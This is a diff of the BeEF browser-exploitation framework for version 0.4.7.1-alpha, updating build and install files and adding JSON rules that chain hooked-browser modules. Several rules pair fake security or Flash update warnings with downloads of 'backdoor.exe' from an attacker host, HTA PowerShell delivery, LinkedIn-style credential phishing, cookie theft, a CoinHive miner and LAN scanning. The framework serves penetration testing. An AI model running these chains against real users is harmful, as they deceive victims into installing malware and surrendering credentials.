BeEF version 0.4.7.1-alpha

Fix detection for IE9/10, Edge, and plugins
Add platformjs to hook
2019-02-27 15:55:28 +00:00 · 2019-02-27 10:08:14 +00:00 · 2019-02-27 06:46:21 +00:00 · 2019-02-27 02:28:02 +11:00 · 2019-02-26 15:22:54 +00:00 · 2019-02-26 03:27:26 +00:00
1727 changed files with 73009 additions and 12363 deletions
--- a/.github/ISSUE_TEMPLATE.md
+++ b/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,49 @@
 Verify first that your issue/request has not been posted previously:
 * https://github.com/beefproject/beef/issues
 * https://github.com/beefproject/beef/wiki/FAQ
 Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.1).
 #### Environment
 What version/revision of BeEF are you using?
 On what version of Ruby?
 On what browser?
 On what operating system?
 #### Configuration
 Are you using a non-default configuration?
 Have you enabled or disabled any BeEF extensions?
 #### Summary
 Please provide a summary of the issue.
 #### Expected Behaviour
 What was the expected result?
 #### Actual Behaviour
 What was the actual result?
 #### Steps to Reproduce
 Please provide steps to reproduce this issue.
 #### Additional Information
 Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots. Debug output can be enabled by specifying `debug: true` in the `config.yaml` configuration file.
--- a/.gitignore
+++ b/.gitignore
@@ -1,8 +1,106 @@
 ### BeEF ###
 beef.db
 test/msf-test
 extensions/admin_ui/media/javascript-min/
 custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
 *.lock
 extensions/metasploit/msf-exploits.cache
 # The following lines were created by https://www.gitignore.io
 ### Linux ###
 *~
 # KDE directory preferences
 .directory
 ### vim ###
 [._]*.s[a-w][a-z]
 [._]s[a-w][a-z]
 *.un~
 Session.vim
 .netrwhist
 *~
 ### Emacs ###
 # -*- mode: gitignore; -*-
 *~
 \#*\#
 /.emacs.desktop
 /.emacs.desktop.lock
 *.elc
 auto-save-list
 tramp
 .\#*
 # Org-mode
 .org-id-locations
 *_archive
 # flymake-mode
 *_flymake.*
 # eshell files
 /eshell/history
 /eshell/lastdir
 # elpa packages
 /elpa/
 # reftex files
 *.rel
 # AUCTeX auto folder
 /auto/
 # cask packages
 .cask/
 ### nanoc ###
 # For projects using nanoc (http://nanoc.ws/)
 # Default location for output, needs to match output_dir's value found in config.yaml
 output/
 # Temporary file directory
 tmp/
 # Crash Log
 crash.log
 ### Windows ###
 # Windows image file caches
 Thumbs.db
 ehthumbs.db
 # Folder config file
 Desktop.ini
 # Recycle Bin used on file shares
 $RECYCLE.BIN/
 # Windows Installer files
 *.cab
 *.msi
 *.msm
 *.msp
 # Windows shortcuts
 *.lnk
 ### TortoiseGit ###
 # Project-level settings
 /.tgitconfig
 test/thirdparty/msf/unit/.byebug_history
 /load
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -0,0 +1,24 @@
 AllCops:
  Exclude:
    - 'test/**/*'
    - 'tmp/**/*'
    - 'tools/**/*'
    - 'doc/**/*'
  TargetRubyVersion: 2.4
 Metrics/AbcSize:
  Enabled: false
 Metrics/BlockLength:
  Enabled: false
 Metrics/ClassLength:
  Enabled: false
 Metrics/LineLength:
  Enabled: false
 Metrics/MethodLength:
  Enabled: false
 Metrics/PerceivedComplexity:
  Enabled: false
 Metrics/CyclomaticComplexity:
  Enabled: false
 Style/FrozenStringLiteralComment:
  Enabled: false
--- a/.ruby-gemset
+++ b/.ruby-gemset
@@ -0,0 +1 @@
 beef
--- a/.ruby-version
+++ b/.ruby-version
@@ -0,0 +1 @@
 2.5.3
--- a/.travis.yml
+++ b/.travis.yml
@@ -0,0 +1,23 @@
 language: ruby
 rvm:
  - 2.4.0
  - 2.5.0
  - 2.6.0
 env:
  - "BEEF_TEST=true"
 notifications:
  email:
    recipients:
      - wade@bindshell.net
    on_success: always
    on_failure: always
 addons:
  apt:
    packages:
      - libsqlite3-dev
      - build-essential
      - patch
      - ruby-dev
      - zlib1g-dev
      - liblzma-dev
      - libcurl4-openssl-dev
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -1,2 +0,0 @@
 # Reference for old (<1.2) versions of BeEF Live
 bash /opt/beef/liveCD/BeEFLive.sh
--- a/134
+++ b/134
@@ -1,61 +1,101 @@
 # BeEF's Gemfile
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-gem "eventmachine", "1.0.3"
+gem 'eventmachine'
-gem "thin"
+gem 'thin'
-gem "sinatra", "1.4.2"
+gem 'sinatra', '~> 2.0'
-gem "rack", "1.5.2"
+gem 'rack', '~> 2.0'
-gem "em-websocket", "~> 0.3.6" # WebSocket support
+gem 'rack-protection', '~> 2.0'
-gem "uglifier", "~> 2.2.1"
+gem 'em-websocket' # WebSocket support
 gem 'uglifier'
 gem 'mime-types'
 gem 'execjs'
 gem 'ansi'
 gem 'term-ansicolor', :require => 'term/ansicolor'
 gem 'dm-core'
 gem 'json'
 gem 'data_objects'
 gem 'rubyzip', '>= 1.2.2'
 gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
 gem 'nokogiri', '>= 1.7'
 gem 'rake'
-# Windows support
+# SQLite support
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
+group :sqlite do
-  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
+  gem 'dm-sqlite-adapter'
  gem "therubyracer", "~> 0.11.0beta1"
  gem "execjs"
  gem "win32console"
 elsif !RUBY_PLATFORM.downcase.include?("darwin")
  gem "therubyracer"
  gem "execjs"
 end
-gem "ansi"
+# PostgreSQL support
-gem "term-ansicolor", :require => "term/ansicolor"
+group :postgres do
-gem "dm-core"
+  #gem dm-postgres-adapter
-gem "json"
+end
-gem "data_objects"
+
-gem "dm-sqlite-adapter"  # SQLite support
+# MySQL support
-#gem dm-postgres-adapter # PostgreSQL support
+group :mysql do
-#gem dm-mysql-adapter    # MySQL support
+  #gem dm-mysql-adapter
-gem "parseconfig"
+end
-gem "erubis"
+
-gem "dm-migrations"
+# Geolocation support
-gem "msfrpc-client"        # Metasploit Integration extension
+group :geoip do
-#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
+  gem 'maxmind-db'
-gem "rubyzip", ">= 1.0.0"
+end
-gem "rubydns"              # DNS extension
+
-gem "sourcify"
+gem 'parseconfig'
-gem "geoip"                # geolocation support
+gem 'erubis'
 gem 'dm-migrations'
 # Metasploit Integration extension
 group :ext_msf do
  gem 'msfrpc-client'
  gem 'xmlrpc'
 end
 # Notifications extension
 group :ext_notifications do
  # Pushover
  gem 'rushover'
  # Slack
  gem 'slack-notifier'
  # Twitter
  gem 'twitter', '>= 5.0.0'
 end
 # DNS extension
 group :ext_dns do
  gem 'rubydns', '~> 0.7.3'
 end
 # QRcode extension
 group :ext_qrcode do
  gem 'qr4r'
 end
 # For running unit tests
-if ENV['BEEF_TEST']
+group :test do
-  gem "test-unit"
+  if ENV['BEEF_TEST']
-  gem "test-unit-full"
+    gem 'test-unit'
-  gem "curb"
+    gem 'test-unit-full'
-  gem "test-unit"
+    gem 'rspec'
-  gem "selenium"
+	gem 'rdoc'
-  gem "selenium-webdriver"
+    # curb gem requires curl libraries
-  # nokogirl is needed by capybara which may require one of the below commands
+    # sudo apt-get install libcurl4-openssl-dev
-  # sudo apt-get install libxslt-dev libxml2-dev
+    gem 'curb'
-  # sudo port install libxml2 libxslt
+    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
-  gem "capybara"
+    gem 'selenium'
-  # RESTful API tests/generic command module tests
+    gem 'selenium-webdriver', '~> 2.53.4'
-  gem "rest-client", "~> 1.6.7"
+    # nokogirl is needed by capybara which may require one of the below commands
    # sudo apt-get install libxslt-dev libxml2-dev
    # sudo port install libxml2 libxslt
    gem 'capybara'
    # RESTful API tests/generic command module tests
    gem 'rest-client', '>= 2.0.1'
    gem 'byebug'
  end
 end
-source "http://rubygems.org"
+source 'https://rubygems.org'
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,74 +1,71 @@
 ===============================================================================
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
 ===============================================================================
 Source
 ------
 Obtain application source code either by downloading the latest archive:
  $ wget https://github.com/beefproject/beef/archive/master.zip
 Or cloning the Git repository from Github:
  $ git clone https://github.com/beefproject/beef
 Prerequisites
 --------------
 BeEF requires Ruby 2.4+.
 If your operating system package manager does not support Ruby version 2.4,
 you can add the brightbox ppa repository for the latest version of Ruby:
  $ sudo apt-add-repository -y ppa:brightbox/ruby-ng
 Alternatively, consider using a Ruby environment manager such as rbenv or rvm
 to manager your Ruby versions. Refer to the following for more information:
  * rbenv: https://github.com/rbenv/rbenv
  * rvm: https://rvm.io/rvm/install
 Installation
 ------------
-   1. Prerequisites (platform independent)
+Once Ruby is installed, run the install script in the BeEF directory:
-   2. Prerequisites (Windows)
+
-   3. Prerequisites (Linux)
+  ./install
-   4. Prerequisites (Mac OSX)
+
-   5. Install instructions
+This script installs the required operating system packages and all the
-   6. Run instructions
+prerequisite Ruby gems.
 Upon successful installation, be sure to read the Configuration page
 on the wiki for important details on configuring and securing BeEF.
  https://github.com/beefproject/beef/wiki/Configuration
 Start BeEF
 ----------
-   1. Prerequisites (platform independent)
+To start BeEF, simply run:
-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+  $ ./beef
      gem install bundler
-      
+Updating
-   2. Prerequisites (Windows)
+--------
-      !!! This must be done PRIOR to running the bundle install command !!!
+Due to the fast-paced nature of web browser development and webappsec landscape,
-      
+it's best to regularly update BeEF to the latest version.
      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
+If you're using BeEF from the GitHub repository, updating is as simple as:
-	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
+  $ git pull
   3. Prerequisites (Linux)
      !!! This must be done PRIOR to running the bundle install command !!!
      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatible and conflicting ruby packages that are required
      3.2. rvm install 1.9.3-p484
      3.3. rvm use 1.9.3
   4. Prerequisites (Mac OSX)
      - XCode: provides the sqlite support BeEF needs
      - Ruby 1.9
      	To install RVM and Ruby 1.9.3 on Mac OS:  
      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
      	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
   5. Install instructions
      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
 	  Enter into the newly created BeEF directory, and type:
 	  bundle install
      Bundler installs all the pre-requisite gems.
   6. Run instructions
      Simply run:
      ./beef -x
--- a/60
+++ b/60
@@ -1,60 +0,0 @@
 ===============================================================================
    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
 ===============================================================================
 What is BeEF?
 -------------
 BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
 Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
 Get Involved 
 ------------
 You can get in touch with the BeEF team. Just check out the following: 
 Please, send us pull requests!
 Web: http://beefproject.com/
 Mail: beef-subscribe@bindshell.net
 IRC: ircs://irc.freenode.net/beefproject
 Twitter: @beefproject
 Requirements
 ------------
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
 * [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 Quick Start
 ----------- 
 __The following is for the impatient.__ 
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 Usage 
 ----- 
 To get started, simply execute beef and follow the instructions:
   $ ./beef
--- a/README.mkd
+++ b/README.mkd
@@ -1,6 +1,6 @@
 ===============================================================================
-   
+
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
@@ -14,17 +14,19 @@ __BeEF__ is short for __The Browser Exploitation Framework__. It is a penetratio
 Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-Get Involved 
+Get Involved
 ------------
-You can get in touch with the BeEF team. Just check out the following: 
+You can get in touch with the BeEF team. Just check out the following:
 __Please, send us pull requests!__
-__Web:__ http://beefproject.com/
+__Web:__ https://beefproject.com/
-__Mail:__ beef-subscribe@bindshell.net
+__Bugs:__ https://github.com/beefproject/beef/issues
 __Security Bugs:__ security@beefproject.com
 __IRC:__ ircs://irc.freenode.net/beefproject
@@ -34,30 +36,37 @@ __Twitter:__ @beefproject
 Requirements
 ------------
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
-* [Ruby](http://rubylang.org) 1.9.2 or higher
+* [Ruby](http://ruby-lang.org): 2.4 or newer
-* [SQLite](http://sqlite.org) 3.x
+* [SQLite](http://sqlite.org): 3.x
 * [Node.js](https://nodejs.org): 6 or newer
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
 * Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)
 Quick Start
----------- 
+-----------
-__The following is for the impatient.__ 
+__The following is for the impatient.__
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+The `install` script installs the required operating system packages and all the prerequisite Ruby gems:
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+```
 $ ./install
 ```
 For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt).
 We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
 Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.
-Usage 
+Usage
----- 
+-----
-To get started, simply execute beef and follow the instructions: 
+To get started, simply execute beef and follow the instructions:
-       $ ./beef
+```
-
+$ ./beef
-On windows use
+```
      $ ruby beef
--- a/114
+++ b/114
@@ -1,8 +1,10 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 require 'yaml'
 #require 'pry-byebug'
 task :default => ["quick"]
@@ -45,10 +47,78 @@ task :msf => ["install", "msf_install"] do
  Rake::Task['msf_stop'].invoke
 end
 desc 'Generate API documentation to doc/rdocs/index.html'
 task :rdoc do
  Rake::Task['rdoc:rerdoc'].invoke
 end
 desc 'rest test examples'
 task :rest_test do
  Rake::Task['beef_start'].invoke
  sh 'cd test/api/; ruby -W2 1333_auth_rate.rb'
  Rake::Task['beef_stop'].invoke
 end
 ################################
 # SSL/TLS certificate
 namespace :ssl do
  desc 'Create a new SSL certificate'
  task :create do
    if File.file?('beef_key.pem')
      puts 'Certificate already exists. Replace? [Y/n]'
      confirm = STDIN.getch.chomp
      unless confirm.eql?('') || confirm.downcase.eql?('y')
        puts "Aborted"
        exit 1
      end
    end
    Rake::Task['ssl:replace'].invoke
  end
  desc 'Re-generate SSL certificate'
  task :replace do
    if File.file?('/usr/local/bin/openssl')
      path = '/usr/local/bin/openssl'
    elsif File.file?('/usr/bin/openssl')
      path = '/usr/bin/openssl'
    else
      puts "[-] Error: could not find openssl"
      exit 1
    end
    IO.popen([path, 'req', '-new', '-newkey', 'rsa:4096', '-sha256', '-x509', '-days', '3650', '-nodes', '-out', 'beef_cert.pem', '-keyout', 'beef_key.pem', '-subj', '/CN=localhost'], 'r+').read.to_s
  end
 end
 ################################
 # rdoc
 namespace :rdoc do
  require 'rdoc/task'
  desc 'Generate API documentation to doc/rdocs/index.html'
  Rake::RDocTask.new do |rd|
    rd.rdoc_dir = 'doc/rdocs'
    rd.main = 'README.mkd'
    rd.rdoc_files.include('core/**/*\.rb')
      #'extensions/**/*\.rb'
      #'modules/**/*\.rb'
    rd.options << '--line-numbers'
    rd.options << '--all'
  end
 end
 ################################
 # Install
 #task :install do
 #  sh "export BEEF_TEST=true"
 #end
 ################################
 # X11 set up
@@ -67,28 +137,54 @@ end
 task :xserver_stop do
  puts "\nShutting down X11 Server...\n"
-  sh "ps -ef|grep Xvfb|grep -v grep|awk '{print $2}'|xargs kill"
+  sh "ps -ef|grep Xvfb|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end
 ################################
 # BeEF environment set up
@beef_process_id = nil;
@beef_config_file = 'tmp/rk_beef_conf.yaml';
 task :beef_start => 'beef' do
  # read environment param for creds or use bad_fred
  test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
  test_pass = ENV['TEST_BEEF_PASS'] || 'bad_fred_no_access'
  # write a rake config file for beef
  config = YAML.load(File.read('./config.yaml'))
  config['beef']['credentials']['user'] = test_user
  config['beef']['credentials']['passwd'] = test_pass
  Dir.mkdir('tmp') unless Dir.exists?('tmp')
  File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
  # set the environment creds -- in case we're using bad_fred
  ENV['TEST_BEEF_USER'] = test_user
  ENV['TEST_BEEF_PASS'] = test_pass
  config = nil
  puts "Using config file: #{@beef_config_file}\n"
  printf "Starting BeEF (wait a few seconds)..."
-  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
+  @beef_process_id = IO.popen("ruby ./beef -c #{@beef_config_file} -x 2> /dev/null", "w+")
-  delays = [10, 10, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays = [5, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
  delays.each do |i| # delay for a few seconds
    printf '.'
    sleep (i)
  end
-  puts '.'
+  puts ".\n\n"
 end
 task :beef_stop do
-  puts "\nShutting down BeEF...\n"
+  # cleanup tmp/config files
-  sh "ps -ef|grep beef|grep -v grep|awk '{print $2}'|xargs kill"
+  puts "\nCleanup config file:\n"
  rm_f @beef_config_file
  ENV['TEST_BEEF_USER'] = nil
  ENV['TEST_BEEF_PASS'] = nil
  # shutting down
  puts "Shutting down BeEF...\n"
  sh "ps -ef|grep beef|grep -v grep|grep -v rake|awk '{print $2}'|xargs kill"
 end
 ################################
@@ -145,7 +241,7 @@ end
 ################################
 # Create CDE Package
-# This will download and make the CDE Executable and 
+# This will download and make the CDE Executable and
 # gnereate a CDE Package in cde-package
 task :cde do
@@ -182,5 +278,3 @@ end
 ################################
--- a/4
+++ b/4
@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-0.4.5.0-alpha
+0.4.7.1-alpha
--- a/arerules/alert.json
+++ b/arerules/alert.json
@@ -0,0 +1,18 @@
 {"name": "Display an alert",
  "author": "mgeeky",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "alert_dialog",
      "condition": null,
      "options": {
        "text":"You've been BeEFed ;>"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/c_osx_test-return-mods.json
+++ b/arerules/c_osx_test-return-mods.json
@@ -0,0 +1,35 @@
 {
  "name": "Test return debug stuff",
  "author": "antisnatchor",
  "browser": "S",
  "browser_version": ">= 7",
  "os": "OSX",
  "os_version": "<= 10.10",
  "modules": [{
    "name": "test_return_ascii_chars",
    "condition": null,
    "options": {}
  }, {
    "name": "test_return_long_string",
    "condition": "status==1",
    "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
    "options": {
      "repeat": "10",
      "repeat_string": "<<mod_input>>"
    }
  },
    {
      "name": "alert_dialog",
      "condition": "status=1",
      "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
      "options":{"text":"<<mod_input>>"}
    },
   {
    "name": "get_page_html",
    "condition": null,
    "options": {}
  }],
  "execution_order": [0, 1, 2, 3],
  "execution_delay": [0, 0, 0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/coinhive_miner.json
+++ b/arerules/coinhive_miner.json
@@ -0,0 +1,20 @@
 {"name": "Start CoinHive JavaScript miner",
  "author": "bcoles",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "coinhive_miner",
      "condition": null,
      "options": {
        "public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
        "mode":"FORCE_EXCLUSIVE_TAB",
        "mobile_enabled":""
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/confirm_close_tab.json
+++ b/arerules/confirm_close_tab.json
@@ -0,0 +1,20 @@
 {"name": "Confirm Close Tab",
  "author": "mgeeky",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "confirm_close_tab",
      "condition": null,
      "code": null,
      "options": {
        "text":"Are you sure you want to navigate away from this page?",
        "usePopUnder":"true"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/enabled/README
+++ b/arerules/enabled/README
@@ -0,0 +1,2 @@
 Move here the ARE rule files that you want to pre-load when BeEF starts.
 Make sure they are .json files (any other file extension is ignored).
--- a/arerules/ff_osx_extension-dropper.json
+++ b/arerules/ff_osx_extension-dropper.json
@@ -0,0 +1,20 @@
 {
  "name": "Firefox Extension Dropper",
  "author": "antisnatchor",
  "browser": "FF",
  "browser_version": "ALL",
  "os": "OSX",
  "os_version": ">= 10.8",
  "modules": [{
    "name": "firefox_extension_dropper",
    "condition": null,
    "options": {
      "extension_name": "Ummeneske",
      "xpi_name": "Ummeneske",
      "base_host": "http://172.16.45.1:3000"
    }
  }],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/get_cookie.json
+++ b/arerules/get_cookie.json
@@ -0,0 +1,18 @@
 {
  "name": "Get Cookie",
  "author": "@benichmt1",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_cookie",
      "condition": null,
      "options": {
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/ie_win_fakenotification-clippy.json
+++ b/arerules/ie_win_fakenotification-clippy.json
@@ -0,0 +1,31 @@
 {
  "name": "Ie Fake Notification + Clippy",
  "author": "antisnatchor",
  "browser": "IE",
  "browser_version": "== 11",
  "os": "Windows",
  "os_version": ">= 7",
  "modules": [
    {
      "name": "fake_notification",
      "condition": null,
      "options": {
        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
      }
    }
  ,{
      "name": "clippy",
      "condition": null,
      "options": {
        "clippydir": "http://172.16.45.1:3000/clippy/",
        "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
        "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
        "respawntime":"5000",
        "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
      }
    }
  ],
  "execution_order": [0,1],
  "execution_delay": [0,2000],
  "chain_mode": "sequential"
 }
--- a/arerules/ie_win_htapowershell.json
+++ b/arerules/ie_win_htapowershell.json
@@ -0,0 +1,27 @@
 {
  "name": "HTA PowerShell",
  "author": "antisnatchor",
  "browser": "IE",
  "browser_version": "ALL",
  "os": "Windows",
  "os_version": ">= 7",
  "modules": [
    {
      "name": "fake_notification",
      "condition": null,
      "options": {
        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
      }
    },
    {
      "name": "hta_powershell",
      "condition": null,
      "options": {
        "domain":"http://172.16.45.1:3000",
        "ps_url":"/ps"
      }
    }],
  "execution_order": [0,1],
  "execution_delay": [0,500],
  "chain_mode": "sequential"
 }
--- a/arerules/ie_win_missingflash-prettytheft.json
+++ b/arerules/ie_win_missingflash-prettytheft.json
@@ -0,0 +1,27 @@
 {
  "name": "Fake missing plugin + Pretty Theft LinkedIn",
  "author": "antisnatchor",
  "browser": "IE",
  "browser_version": ">= 8",
  "os": "Windows",
  "os_version": "== XP",
  "modules": [{
    "name": "fake_notification_c",
    "condition": null,
    "options": {
      "url": "http://172.16.45.1:3000/updates/backdoor.exe",
      "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
    }
  }, {
    "name": "pretty_theft",
    "condition": null,
    "options": {
      "choice": "Windows",
      "backing": "Grey",
      "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
    }
  }],
  "execution_order": [0, 1],
  "execution_delay": [0, 5000],
  "chain_mode": "sequential"
 }
--- a/arerules/ie_win_test-return-mods.json
+++ b/arerules/ie_win_test-return-mods.json
@@ -0,0 +1,35 @@
 {
  "name": "Test return debug stuff",
  "author": "antisnatchor",
  "browser": "IE",
  "browser_version": "<= 8",
  "os": "Windows",
  "os_version": ">= XP",
  "modules": [{
    "name": "test_return_ascii_chars",
    "condition": null,
    "options": {}
  }, {
    "name": "test_return_long_string",
    "condition": "status==1",
    "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
    "options": {
      "repeat": "10",
      "repeat_string": "<<mod_input>>"
    }
  },
    {
      "name": "alert_dialog",
      "condition": "status=1",
      "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
      "options":{"text":"<<mod_input>>"}
    },
   {
    "name": "get_page_html",
    "condition": null,
    "options": {}
  }],
  "execution_order": [0, 1, 2, 3],
  "execution_delay": [0, 0, 0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_cors_scan.json
+++ b/arerules/lan_cors_scan.json
@@ -0,0 +1,28 @@
 {"name": "LAN CORS Scan",
  "author": "bcoles",
  "browser": ["FF", "C"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
      "condition": null,
      "code": null,
      "options": {}
    },
    {"name": "cross_origin_scanner_cors",
      "condition": "status==1",
      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
        "ipRange":"<<mod_input>>",
        "ports":"80,8080",
        "threads":"2",
        "wait":"2",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_cors_scan_common.json
+++ b/arerules/lan_cors_scan_common.json
@@ -0,0 +1,23 @@
 {"name": "LAN CORS Scan (Common IPs)",
  "author": "bcoles",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "cross_origin_scanner_cors",
      "condition": null,
      "code": null,
      "options": {
        "ipRange":"common",
        "ports":"80,8080",
        "threads":"2",
        "wait":"2",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/lan_fingerprint.json
+++ b/arerules/lan_fingerprint.json
@@ -0,0 +1,28 @@
 {"name": "LAN Fingerprint",
  "author": "bcoles",
  "browser": ["FF", "C"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
      "condition": null,
      "code": null,
      "options": {}
    },
    {"name": "internal_network_fingerprinting",
      "condition": "status==1",
      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
